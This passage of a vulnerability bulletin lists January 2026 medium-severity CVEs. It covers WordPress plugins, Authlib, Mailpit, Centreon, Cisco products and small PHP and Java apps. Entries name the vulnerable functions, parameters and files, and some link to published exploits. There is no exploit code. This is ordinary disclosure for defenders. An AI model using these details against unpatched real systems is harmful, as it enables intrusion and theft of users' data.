| ashishajani--Contact Form vCard Generator | The Contact Form vCard Generator plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'wp_gvccf_check_download_request' function in all versions up to, and including, 2.4. This makes it possible for unauthenticated attackers to export sensitive Contact Form 7 submission data via the 'wp-gvc-cf-download-id' parameter, including names, phone numbers, email addresses, and messages. | 2026-01-09 | 5.3 | CVE-2025-13717 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bdde4399-af90-4528-92a4-5176dfa5e453?source=cve https://plugins.trac.wordpress.org/browser/contact-form-vcard-generator/trunk/includes/wp-gvc-cf-settings.php#L13 https://plugins.trac.wordpress.org/browser/contact-form-vcard-generator/tags/2.4/includes/wp-gvc-cf-settings.php#L13 https://plugins.trac.wordpress.org/browser/contact-form-vcard-generator/trunk/includes/wp-gvc-cf-settings.php#L105 https://plugins.trac.wordpress.org/browser/contact-form-vcard-generator/tags/2.4/includes/wp-gvc-cf-settings.php#L105 |
| audrasjb--Key Figures | The Key Figures plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the kf_field_figure_default_color_render function in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-07 | 4.4 | CVE-2025-14792 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f4943899-a25a-4e50-b33e-139ed5e8f748?source=cve http://plugins.trac.wordpress.org/browser/key-figures/tags/1.1/admin/kf-admin.php#L201 |
| authlib--authlib | Authlib is a Python library which builds OAuth and OpenID Connect servers. In version 1.6.5 and prior, cache-backed state/request-token storage is not tied to the initiating user session, so CSRF is possible for any attacker that has a valid state (easily obtainable via an attacker-initiated authentication flow). When a cache is supplied to the OAuth client registry, FrameworkIntegration.set_state_data writes the entire state blob under _state_{app}_{state}, and get_state_data ignores the caller's session altogether. This issue has been patched in version 1.6.6. | 2026-01-08 | 5.7 | CVE-2025-68158 | https://github.com/authlib/authlib/security/advisories/GHSA-fg6f-75jq-6523 https://github.com/authlib/authlib/commit/2808378611dd6fb2532b189a9087877d8f0c0489 https://github.com/authlib/authlib/commit/7974f45e4d7492ab5f527577677f2770ce423228 |
| Automattic--WP Job Manager | Cross-Site Request Forgery (CSRF) vulnerability in Automattic WP Job Manager allows cross-site request forgery. This issue affects WP Job Manager: all versions through 2.0.0. | 2026-01-05 | 5.4 | CVE-2023-52212 | https://vdp.patchstack.com/database/wordpress/plugin/wp-job-manager/vulnerability/wordpress-wp-job-manager-plugin-2-0-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| averta--Depicter Popup & Slider Builder | The Popup and Slider Builder by Depicter - Add Email collecting Popup, Popup Modal, Coupon Popup, Image Slider, Carousel Slider, Post Slider Carousel plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'store' function of the RulesAjaxController class in all versions up to, and including, 4.0.7. This makes it possible for unauthenticated attackers to update pop-up display settings. | 2026-01-06 | 5.3 | CVE-2025-11370 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d35faf39-4882-4393-9b77-57dc45ac9d04?source=cve https://github.com/nguy3nB4oo11/depicter-vuln-repro/blob/main/RulesAjaxController.php https://github.com/nguy3nB4oo11/depicter-vuln-repro/blob/main/ajax.php https://plugins.trac.wordpress.org/changeset/3428118/depicter/trunk/app/routes/ajax.php |
| averta--Phlox | The Phlox theme for WordPress is vulnerable to Stored Cross-Site Scripting via the `data-caption` HTML attribute in all versions up to, and including, 2.17.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-06 | 6.4 | CVE-2025-4776 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a49f8150-a27d-4801-8923-31af335c3cbd?source=cve https://themes.trac.wordpress.org/changeset/300858/ |
| averta--Shortcodes and extra features for Phlox theme | The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a combination of the 'tag' and 'title_tag' parameters in all versions up to, and including, 2.17.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-10 | 6.4 | CVE-2025-12379 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1144e0d9-692e-45a5-ac63-bcdd64a8bd8a?source=cve https://plugins.trac.wordpress.org/browser/auxin-elements/tags/2.17.12/includes/elementor/widgets/heading-modern.php#L1194 https://plugins.trac.wordpress.org/changeset/3429103/auxin-elements/trunk/includes/elementor/widgets/heading-modern.php |
| averta--Shortcodes and extra features for Phlox theme | The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.17.13 via the auxels_ajax_search due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract titles of draft posts that they should not have access to. | 2026-01-06 | 5.3 | CVE-2025-13215 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7f47ab91-7d91-4231-91ef-66c556ad8496?source=cve https://plugins.trac.wordpress.org/browser/auxin-elements/tags/2.17.12/public/includes/frontend-ajax.php#L348 |
| Awethemes--AweBooking | Insertion of Sensitive Information Into Sent Data vulnerability in Awethemes AweBooking allows an attacker to retrieve embedded sensitive data. This issue affects AweBooking: all versions through 3.2.26. | 2026-01-05 | 6.5 | CVE-2025-68014 | https://vdp.patchstack.com/database/wordpress/plugin/awebooking/vulnerability/wordpress-awebooking-plugin-3-2-26-sensitive-data-exposure-vulnerability?_s_id=cve |
| axllent--mailpit | Mailpit is an email testing tool and API for developers. Prior to version 1.28.2, the Mailpit WebSocket server is configured to accept connections from any origin. This lack of Origin header validation introduces a Cross-Site WebSocket Hijacking (CSWSH) vulnerability. An attacker can host a malicious website that, when visited by a developer running Mailpit locally, establishes a WebSocket connection to the victim's Mailpit instance (default ws://localhost:8025). This allows the attacker to intercept sensitive data such as email contents, headers, and server statistics in real-time. This issue has been patched in version 1.28.2. | 2026-01-10 | 6.5 | CVE-2026-22689 | https://github.com/axllent/mailpit/security/advisories/GHSA-524m-q5m7-79mm https://github.com/axllent/mailpit/commit/6f1f4f34c98989fd873261018fb73830b30aec3f |
| axllent--mailpit | Mailpit is an email testing tool and API for developers. Versions 1.28.0 and below have a Server-Side Request Forgery (SSRF) vulnerability in the /proxy endpoint, allowing attackers to make requests to internal network resources. The /proxy endpoint validates http:// and https:// schemes, but it does not block internal IP addresses, enabling attackers to access internal services and APIs. This vulnerability is limited to HTTP GET requests with minimal headers. The issue is fixed in version 1.28.1. | 2026-01-07 | 5.8 | CVE-2026-21859 | https://github.com/axllent/mailpit/security/advisories/GHSA-8v65-47jx-7mfr https://github.com/axllent/mailpit/commit/3b9b470c093b3d20b7d751722c1c24f3eed2e19d |
| baqend--Speed Kit | Missing Authorization vulnerability in baqend Speed Kit allows exploitation of incorrectly configured access control security levels. This issue affects Speed Kit: all versions through 2.0.2. | 2026-01-08 | 4.3 | CVE-2026-22487 | https://patchstack.com/database/wordpress/plugin/baqend/vulnerability/wordpress-speed-kit-plugin-2-0-2-broken-access-control-vulnerability?_s_id=cve |
| beshkin--Shabat Keeper | The Shabat Keeper plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $_SERVER['PHP_SELF'] parameter in all versions up to, and including, 0.4.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-09 | 6.1 | CVE-2025-13701 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3aa73be6-0836-4540-8a80-e1da34c0ee0d?source=cve https://plugins.trac.wordpress.org/browser/shabat-keeper/trunk/shabat-keeper.php#L148 https://plugins.trac.wordpress.org/browser/shabat-keeper/tags/0.4.4/shabat-keeper.php#L148 |
| bg5sbk--MiniCMS | A flaw has been found in bg5sbk MiniCMS up to 1.8, in the delete_page function of the file /minicms/mc-admin/page.php (File Recovery Request Handler). Manipulating this request results in improper authentication, allowing unauthorized page deletion. The attack can be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 6.5 | CVE-2025-15455 | VDB-339488 (bg5sbk MiniCMS File Recovery Request page.php delete_page improper authentication); VDB-339488 CTI Indicators (IOB, IOC, IOA); Submit #725137 (MiniCMS V1.8 Unauthorized page deletion); https://github.com/bg5sbk/MiniCMS https://github.com/ueh1013/VULN/issues/14 |
| BiggiDroid--Simple PHP CMS | A vulnerability was found in BiggiDroid Simple PHP CMS 1.0, in an unknown function of the file /admin/editsite.php. Manipulation of the argument image results in unrestricted file upload. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-09 | 4.7 | CVE-2025-15495 | VDB-340273 (BiggiDroid Simple PHP CMS editsite.php unrestricted upload); VDB-340273 CTI Indicators (IOB, IOC, TTP, IOA); Submit #725890 (BiggiDroid Simple PHP CMS 1.0 Unrestricted Upload); Submit #726040 (BiggiDroid Simple PHP CMS 1.0 Unrestricted Upload, duplicate); https://gitee.com/hdert/ck/issues/IDGO28 https://github.com/Asim-QAZi/RCE-Simplephpblog-biggiedroid |
| bitpressadmin--Bit Form Custom Contact Form, Multi Step, Conversational Form & Payment Form builder | The Bit Form - Contact Form Plugin plugin for WordPress is vulnerable to unauthorized workflow execution due to missing authorization in the triggerWorkFlow function in all versions up to, and including, 2.21.6. This is due to a logic flaw in the nonce verification where the security check only blocks requests when both the nonce verification fails and the user is logged in. This makes it possible for unauthenticated attackers to replay form workflow executions and trigger all configured integrations including webhooks, email notifications, CRM integrations, and automation platforms via the bitforms_trigger_workflow AJAX action granted they can obtain the entry ID and log IDs from a legitimate form submission response. | 2026-01-07 | 6.5 | CVE-2025-14901 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0402e4a6-73ba-49e6-bf80-997ac83b4cfe?source=cve https://plugins.trac.wordpress.org/browser/bit-form/tags/2.21.6/includes/Frontend/Ajax/FrontendAjax.php#L146 https://plugins.trac.wordpress.org/browser/bit-form/tags/2.21.6/includes/Frontend/Ajax/FrontendAjax.php#L30 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3429172%40bit-form%2Ftrunk&old=3420966%40bit-form%2Ftrunk&sfp_email=&sfph_mail=#file827 |
| bluelabsio--records-mover | A weakness has been identified in bluelabsio records-mover up to 1.5.4, in an unknown function of the Table Object Handler component. Manipulation results in SQL injection. The attack needs to be launched locally. Upgrading to version 1.6.0 fixes this issue; the patch is commit 3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa. You should upgrade the affected component. | 2026-01-07 | 5.3 | CVE-2023-7333 | VDB-339566 (bluelabsio records-mover Table Object sql injection); VDB-339566 CTI Indicators (IOB, IOC, TTP); https://github.com/bluelabsio/records-mover/pull/254 https://github.com/bluelabsio/records-mover/commit/3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa https://github.com/bluelabsio/records-mover/releases/tag/v1.6.0 |
| bruterdregz--Contact Us Simple Form | The Contact Us Simple Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 4.4 | CVE-2025-14028 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2c78ab13-22ed-4f00-b132-c9ff99c51273?source=cve https://plugins.trac.wordpress.org/browser/contact-us-simple-form/trunk/contact-us-simple-form.php#L223 https://plugins.trac.wordpress.org/browser/contact-us-simple-form/tags/1.0/contact-us-simple-form.php#L223 https://plugins.trac.wordpress.org/browser/contact-us-simple-form/trunk/contact-us-simple-form.php#L239 https://plugins.trac.wordpress.org/browser/contact-us-simple-form/tags/1.0/contact-us-simple-form.php#L239 |
| BuddyDev--MediaPress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BuddyDev MediaPress allows stored XSS. This issue affects MediaPress: all versions through 1.6.2. | 2026-01-08 | 6.5 | CVE-2026-22519 | https://patchstack.com/database/wordpress/plugin/mediapress/vulnerability/wordpress-mediapress-plugin-1-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| buddydev--MediaPress | The MediaPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mpp-uploader shortcode in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-06 | 6.4 | CVE-2025-14552 | https://www.wordfence.com/threat-intel/vulnerabilities/id/82b5ade8-582e-4440-b043-d30e757c9467?source=cve https://plugins.trac.wordpress.org/browser/mediapress/tags/1.6.1/core/gallery/mpp-gallery-template-tags.php#L665 |
| burtrw--Lesson Plan Book | The Lesson Plan Book plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-09 | 6.1 | CVE-2025-13893 | https://www.wordfence.com/threat-intel/vulnerabilities/id/18696937-5cc5-4e14-940d-fc25468377a3?source=cve https://plugins.trac.wordpress.org/browser/lesson-plan-book/trunk/lesson.php#L719 https://plugins.trac.wordpress.org/browser/lesson-plan-book/trunk/lesson.php#L1776 https://plugins.trac.wordpress.org/browser/lesson-plan-book/trunk/lesson.php#L1910 |
| bww--URL Image Importer | The URL Image Importer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.7 due to insufficient sanitization of SVG files. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2026-01-06 | 6.4 | CVE-2025-14120 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8704320e-9624-4924-92e8-adb61356aecb?source=cve https://plugins.trac.wordpress.org/browser/url-image-importer/trunk/url-image-importer.php#L176 https://plugins.trac.wordpress.org/browser/url-image-importer/tags/1.0.7/url-image-importer.php#L176 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3429292%40url-image-importer&new=3429292%40url-image-importer&sfp_email=&sfph_mail= |
| callumalden--Starred Review | The Starred Review plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the PHP_SELF variable in all versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-14118 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2eb65c25-9400-4c5a-a4b2-b72628725500?source=cve https://plugins.trac.wordpress.org/browser/starred-review/trunk/starred-review.php#L29 https://plugins.trac.wordpress.org/browser/starred-review/tags/1.4.2/starred-review.php#L29 |
| Campcodes--Supplier Management System | A flaw has been found in Campcodes Supplier Management System 1.0, in unknown functionality of the file /retailer/edit_profile.php. Manipulation of the argument txtRetailerAddress causes SQL injection. Remote exploitation is possible. The exploit has been published and may be used. | 2026-01-05 | 6.3 | CVE-2026-0597 | VDB-339506 (Campcodes Supplier Management System edit_profile.php sql injection); VDB-339506 CTI Indicators (IOB, IOC, TTP, IOA); Submit #731433 (campcodes Supplier Management System 1.0 SQL Injection); https://github.com/dhy-spec/cve/issues/1 https://www.campcodes.com/ |
| carboneio--carbone | A weakness has been identified in carboneio carbone up to commit fbcd349077ad0e8748be73eab2a82ea92b6f8a7e, in an unknown function of the file lib/input.js (Formatter Handler component). Manipulation can lead to improperly controlled modification of object prototype attributes (prototype pollution). The attack can be launched remotely, but it is of high complexity and exploitation is said to be difficult. Upgrading to version 3.5.6 fixes this issue; the patch is commit 04f9feb24bfca23567706392f9ad2c53bbe4134e. You should upgrade the affected component. Successful exploitation can "only occur if the parent NodeJS application has the same security issue". | 2026-01-07 | 5 | CVE-2024-14020 | VDB-339503 (carboneio carbone Formatter input.js prototype pollution); VDB-339503 CTI Indicators (IOB, IOC, TTP, IOA); https://github.com/carboneio/carbone/commit/04f9feb24bfca23567706392f9ad2c53bbe4134e https://github.com/carboneio/carbone/releases/tag/3.5.6 |
| cbutlerjr--WP-Members Membership Plugin | The WP-Members Membership Plugin for WordPress is vulnerable to unauthorized file access in versions up to, and including, 3.5.4.4. This is due to storing user-uploaded files in predictable directories (wp-content/uploads/wpmembers/user_files/<user_id>/) without implementing proper access controls beyond basic directory listing protection (.htaccess with Options -Indexes). This makes it possible for unauthenticated attackers to directly access and download sensitive documents uploaded by site users via direct URL access, granted they can guess or enumerate user IDs and filenames. | 2026-01-07 | 5.3 | CVE-2025-12648 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9d0154fd-0cab-4445-a92e-c44ae9931479?source=cve https://plugins.trac.wordpress.org/browser/wp-members/trunk/includes/class-wp-members-forms.php#L604 https://plugins.trac.wordpress.org/browser/wp-members/trunk/includes/admin/class-wp-members-admin-api.php#L707 https://plugins.trac.wordpress.org/changeset/3427043/wp-members/trunk/includes/class-wp-members-forms.php |
| Centreon--Infra Monitoring | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (DSM extension configuration modules) allows Stored XSS to users with elevated privileges. This issue affects Infra Monitoring: from 25.10.0 before 25.10.1, from 24.10.0 before 24.10.4, from 24.04.0 before 24.04.8. | 2026-01-05 | 6.8 | CVE-2025-12511 | https://github.com/centreon/centreon/releases https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12511-centreon-dsm-medium-severity-5361 |
| Centreon--Infra Monitoring | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Hosts configuration form modules) allows Stored XSS to users with high privileges. This issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.15, from 24.04.0 before 24.04.19. | 2026-01-05 | 6.8 | CVE-2025-12513 | https://github.com/centreon/centreon/releases https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12513-centreon-web-medium-severity-5360 |
| Centreon--Infra Monitoring | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Administration ACL menu configuration modules) allows Stored XSS to users with high privileges. This issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.15, from 24.04.0 before 24.04.19. | 2026-01-05 | 6.8 | CVE-2025-13056 | https://github.com/centreon/centreon/releases https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-13056-centreon-web-medium-severity-5358 |
| Centreon--Infra Monitoring | Missing Authorization vulnerability in Centreon Infra Monitoring (Administration parameters API endpoint modules) allows Accessing Functionality Not Properly Constrained by ACLs, resulting in Information Disclosure like downtime or acknowledgement configurations. This issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.15, from 24.04.0 before 24.04.19. | 2026-01-05 | 5.3 | CVE-2025-12519 | https://github.com/centreon/centreon/releases https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12519-centreon-web-medium-severity-5359 |
| charmbracelet--soft-serve | Soft Serve is a self-hostable Git server for the command line. Prior to version 0.11.2, an authorization bypass in the LFS lock deletion endpoint allows any authenticated user with repository write access to delete locks owned by other users by setting the force flag. The vulnerable code path processes force deletions before retrieving user context, bypassing ownership validation entirely. This issue has been patched in version 0.11.2. | 2026-01-08 | 5.4 | CVE-2026-22253 | https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-6jm8-x3g6-r33j https://github.com/charmbracelet/soft-serve/commit/000ab5164f0be68cf1ea6b6e7227f11c0e388a42 |
| chrisblackwell--1180px Shortcodes | The 1180px Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' shortcode attribute in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14114 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ddf2ca43-a1d5-4809-b8ad-916b23f71a7d?source=cve https://plugins.trac.wordpress.org/browser/1180px-shortcodes/trunk/1180px.php#L115 https://plugins.trac.wordpress.org/browser/1180px-shortcodes/tags/1.1.1/1180px.php#L115 |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in the licensing features of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker with administrative privileges to gain access to sensitive information. This vulnerability is due to improper parsing of XML (XML External Entity, XXE) that is processed by the web-based management interface of Cisco ISE and Cisco ISE-PIC. An attacker could exploit this vulnerability by uploading a malicious file to the application. A successful exploit could allow the attacker to read arbitrary files from the underlying operating system that could include sensitive data that should otherwise be inaccessible even to administrators. To exploit this vulnerability, the attacker must have valid administrative credentials. | 2026-01-07 | 4.9 | CVE-2026-20029 | cisco-sa-ise-xxe-jWSbSDKt |
| Cisco--Cisco Secure Firewall Threat Defense (FTD) Software | Multiple Cisco products are affected by a vulnerability in the processing of DCE/RPC requests that could allow an unauthenticated, remote attacker to cause the Snort 3 Detection Engine to leak sensitive information or to restart, resulting in an interruption of packet inspection. This vulnerability is due to an error in buffer handling logic when processing DCE/RPC requests, which can result in a buffer use-after-free read. An attacker could exploit this vulnerability by sending a large number of DCE/RPC requests through an established connection that is inspected by Snort 3. A successful exploit could allow the attacker to unexpectedly restart the Snort 3 Detection Engine, which could cause a denial of service (DoS). | 2026-01-07 | 5.8 | CVE-2026-20026 | cisco-sa-snort3-dcerpc-vulns-J9HNF4tH |
| Cisco--Cisco Secure Firewall Threat Defense (FTD) Software | Multiple Cisco products are affected by a vulnerability in the processing of DCE/RPC requests that could allow an unauthenticated, remote attacker to cause the Snort 3 Detection Engine to leak sensitive information or to restart, resulting in an interruption of packet inspection. This vulnerability is due to an error in buffer handling logic when processing DCE/RPC requests, which can result in a buffer out-of-bounds read. An attacker could exploit this vulnerability by sending a large number of DCE/RPC requests through an established connection that is inspected by Snort 3. A successful exploit could allow the attacker to obtain sensitive information in the Snort 3 data stream. | 2026-01-07 | 5.3 | CVE-2026-20027 | cisco-sa-snort3-dcerpc-vulns-J9HNF4tH |
| cld378632668--JavaMall | A vulnerability was found in cld378632668 JavaMall up to 994f1e2b019378ec9444cdf3fce2d5b5f72d28f0. This impacts the function Upload of the file src/main/java/com/macro/mall/controller/MinioController.java. The manipulation results in unrestricted upload. It is possible to launch the attack remotely. This product takes the approach of rolling releases to provide continuous delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 6.3 | CVE-2025-15448 | VDB-339481; cld378632668 JavaMall MinioController.java upload unrestricted upload VDB-339481; CTI Indicators (IOB, IOC, TTP, IOA) Submit #721997; https://github.com/cld378632668/JavaMall JavaMall 1.0 Upload any file https://github.com/zyhzheng500-maker/cve/blob/main/javamall%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.md |
| cld378632668--JavaMall | A vulnerability was determined in cld378632668 JavaMall up to 994f1e2b019378ec9444cdf3fce2d5b5f72d28f0. Affected is the function delete of the file src/main/java/com/macro/mall/controller/MinioController.java. This manipulation of the argument objectName causes path traversal. The attack can be initiated remotely. Continuous delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 5.4 | CVE-2025-15449 | VDB-339482; cld378632668 JavaMall MinioController.java delete path traversal VDB-339482; CTI Indicators (IOB, IOC, TTP, IOA) Submit #722000; https://github.com/cld378632668/JavaMall JavaMall 1.0 Delete any file https://github.com/zyhzheng500-maker/cve/blob/main/JavaMall%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%88%A0%E9%99%A4.md |
| clevelandwebdeveloper--Smart App Banners | The Smart App Banners plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'size' and 'verticalalign' parameters of the 'app-store-download' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13841 | https://www.wordfence.com/threat-intel/vulnerabilities/id/add85b9b-3a4d-4c46-a90f-10c9645e249d?source=cve https://plugins.trac.wordpress.org/browser/smart-app-banners/trunk/index.php#L321 https://plugins.trac.wordpress.org/browser/smart-app-banners/tags/1.2/index.php#L321 |
| code-projects--Intern Membership Management System | A flaw has been found in code-projects Intern Membership Management System 1.0. The impacted element is an unknown function of the file /intern/admin/edit_admin.php. This manipulation of the argument admin_id causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. | 2026-01-08 | 4.7 | CVE-2026-0697 | VDB-339974; code-projects Intern Membership Management System edit_admin.php sql injection VDB-339974; CTI Indicators (IOB, IOC, TTP, IOA) Submit #732998; code-projects Intern Membership Management System 1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20admin.php%20sql%20injection1.md https://code-projects.org/ |
| code-projects--Intern Membership Management System | A vulnerability has been found in code-projects Intern Membership Management System 1.0. This affects an unknown function of the file /intern/admin/edit_students.php. Such manipulation of the argument admin_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2026-01-08 | 4.7 | CVE-2026-0698 | VDB-339975; code-projects Intern Membership Management System edit_students.php sql injection VDB-339975; CTI Indicators (IOB, IOC, TTP, IOA) Submit #732999; code-projects Intern Membership Management System 1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20students_details.php%20sql%20injection.md https://code-projects.org/ |
| code-projects--Intern Membership Management System | A vulnerability was found in code-projects Intern Membership Management System 1.0. This impacts an unknown function of the file /intern/admin/edit_activity.php. Performing a manipulation of the argument activity_id results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2026-01-08 | 4.7 | CVE-2026-0699 | VDB-339976; code-projects Intern Membership Management System edit_activity.php sql injection VDB-339976; CTI Indicators (IOB, IOC, TTP, IOA) Submit #733000; code-projects Intern Membership Management System activity.php 1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20activity.php%20sql%20injection.md https://code-projects.org/ |
| code-projects--Intern Membership Management System | A vulnerability was identified in code-projects Intern Membership Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /intern/admin/add_admin.php. The manipulation of the argument Username leads to sql injection. The attack can be carried out remotely. The exploit is publicly available and might be used. | 2026-01-08 | 4.7 | CVE-2026-0701 | VDB-339978; code-projects Intern Membership Management System add_admin.php sql injection VDB-339978; CTI Indicators (IOB, IOC, TTP, IOA) Submit #733002; code-projects Intern Membership Management System add_admin.php v1.0 sql injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20add_admin.php%20sql%20injection.md https://code-projects.org/ |
| code-projects--Intern Membership Management System | A security vulnerability has been detected in code-projects Intern Membership Management System 1.0. This issue affects some unknown processing of the file /intern/admin/delete_admin.php. Such manipulation of the argument admin_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-01-08 | 4.7 | CVE-2026-0728 | VDB-340125; code-projects Intern Membership Management System delete_admin.php sql injection VDB-340125; CTI Indicators (IOB, IOC, TTP, IOA) Submit #733003; code-projects Intern Membership Management System delete_admin.php v1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20delete_admin.php%20sql%20injection.md https://code-projects.org/ |
| code-projects--Intern Membership Management System | A vulnerability was detected in code-projects Intern Membership Management System 1.0. Impacted is an unknown function of the file /intern/admin/add_activity.php. Performing a manipulation of the argument Title results in sql injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2026-01-08 | 4.7 | CVE-2026-0729 | VDB-340126; code-projects Intern Membership Management System add_activity.php sql injection VDB-340126; CTI Indicators (IOB, IOC, TTP, IOA) Submit #733004; code-projects Intern Membership Management System add_activity.php v1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20add_activity.php%20sql%20injection.md https://code-projects.org/ |
| code-projects--Intern Membership Management System | A vulnerability was determined in code-projects Intern Membership Management System 1.0. Impacted is an unknown function of the file /admin/delete_activity.php. Executing a manipulation of the argument activity_id can lead to sql injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2026-01-11 | 4.7 | CVE-2026-0850 | VDB-340445; code-projects Intern Membership Management System delete_activity.php sql injection VDB-340445; CTI Indicators (IOB, IOC, TTP, IOA) Submit #733486; code-projects Intern Membership Management System delete_activity.php v1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20delete_activity.php%20sql%20injection.md https://code-projects.org/ |
